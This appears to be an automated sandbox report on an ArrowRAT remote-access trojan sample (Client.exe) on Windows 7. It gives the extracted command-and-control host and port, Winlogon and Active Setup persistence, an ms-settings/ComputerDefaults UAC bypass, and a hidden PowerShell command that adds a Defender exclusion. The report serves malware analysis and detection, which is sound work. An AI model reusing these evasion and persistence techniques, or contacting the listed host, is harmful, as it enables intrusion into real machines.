Analysis
-
max time kernel
127s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26/12/2024, 16:20
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240903-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
b9e38162af37c0f29b683c3c307fae6c
-
SHA1
646eedd6062086bb394c5f5727ff3cfff940e090
-
SHA256
d020ce862bf6ba26a1b4b0ca76ebc2ce9bc5ade16e52c66b11bc4253a16318a7
-
SHA512
85440ad4b1258171ddd280e373b31ea2018538256c21ff024d138f4032bb4717875351073fd987e2c0e120f7dbea5bfc9cf32484224e2c04685a13916b8e44b5
-
SSDEEP
3072:Mbz3H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPmOO8Y:Mbz3e0ODhTEPgnjuIJzo+PPcfPmB8
Malware Config
Extracted
arrowrat
Client
24.ip.gl.ply.gg:46885
BVCkbzdsT
Signatures
-
Arrowrat family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\Pan\\dora'" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe 2640 Client.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2640 Client.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe Token: SeShutdownPrivilege 2788 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe 2788 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2640 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2788 2640 Client.exe 30 PID 2640 wrote to memory of 2788 2640 Client.exe 30 PID 2640 wrote to memory of 2788 2640 Client.exe 30 PID 2640 wrote to memory of 2808 2640 Client.exe 31 PID 2640 wrote to memory of 2808 2640 Client.exe 31 PID 2640 wrote to memory of 2808 2640 Client.exe 31 PID 2640 wrote to memory of 2808 2640 Client.exe 31 PID 2640 wrote to memory of 2820 2640 Client.exe 32 PID 2640 wrote to memory of 2820 2640 Client.exe 32 PID 2640 wrote to memory of 2820 2640 Client.exe 32 PID 2640 wrote to memory of 2820 2640 Client.exe 32 PID 2640 wrote to memory of 2956 2640 Client.exe 33 PID 2640 wrote to memory of 2956 2640 Client.exe 33 PID 2640 wrote to memory of 2956 2640 Client.exe 33 PID 2640 wrote to memory of 2956 2640 Client.exe 33 PID 2640 wrote to memory of 2700 2640 Client.exe 34 PID 2640 wrote to memory of 2700 2640 Client.exe 34 PID 2640 wrote to memory of 2700 2640 Client.exe 34 PID 2640 wrote to memory of 2700 2640 Client.exe 34 PID 2640 wrote to memory of 2656 2640 Client.exe 35 PID 2640 wrote to memory of 2656 2640 Client.exe 35 PID 2640 wrote to memory of 2656 2640 Client.exe 35 PID 2640 wrote to memory of 2656 2640 Client.exe 35 PID 2640 wrote to memory of 2692 2640 Client.exe 36 PID 2640 wrote to memory of 2692 2640 Client.exe 36 PID 2640 wrote to memory of 2692 2640 Client.exe 36 PID 2640 wrote to memory of 2692 2640 Client.exe 36 PID 2640 wrote to memory of 2944 2640 Client.exe 37 PID 2640 wrote to memory of 2944 2640 Client.exe 37 PID 2640 wrote to memory of 2944 2640 Client.exe 37 PID 2640 wrote to memory of 2944 2640 Client.exe 37 PID 2640 wrote to memory of 2552 2640 Client.exe 38 PID 2640 wrote to memory of 2552 2640 Client.exe 38 PID 2640 wrote to memory of 2552 2640 Client.exe 38 PID 2640 wrote to memory of 2552 2640 Client.exe 38 PID 2640 wrote to memory of 2784 2640 Client.exe 39 PID 2640 wrote to memory of 2784 2640 Client.exe 39 PID 2640 wrote to memory of 2784 2640 Client.exe 39 PID 2640 wrote to memory of 2784 2640 Client.exe 39 PID 2640 wrote to memory of 2768 2640 Client.exe 40 PID 2640 wrote to memory of 2768 2640 Client.exe 40 PID 2640 wrote to memory of 2768 2640 Client.exe 40 PID 2640 wrote to memory of 2768 2640 Client.exe 40 PID 2788 wrote to memory of 2736 2788 explorer.exe 41 PID 2788 wrote to memory of 2736 2788 explorer.exe 41 PID 2788 wrote to memory of 2736 2788 explorer.exe 41 PID 2640 wrote to memory of 2572 2640 Client.exe 42 PID 2640 wrote to memory of 2572 2640 Client.exe 42 PID 2640 wrote to memory of 2572 2640 Client.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2736
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2692
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT2⤵PID:2768
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2572
-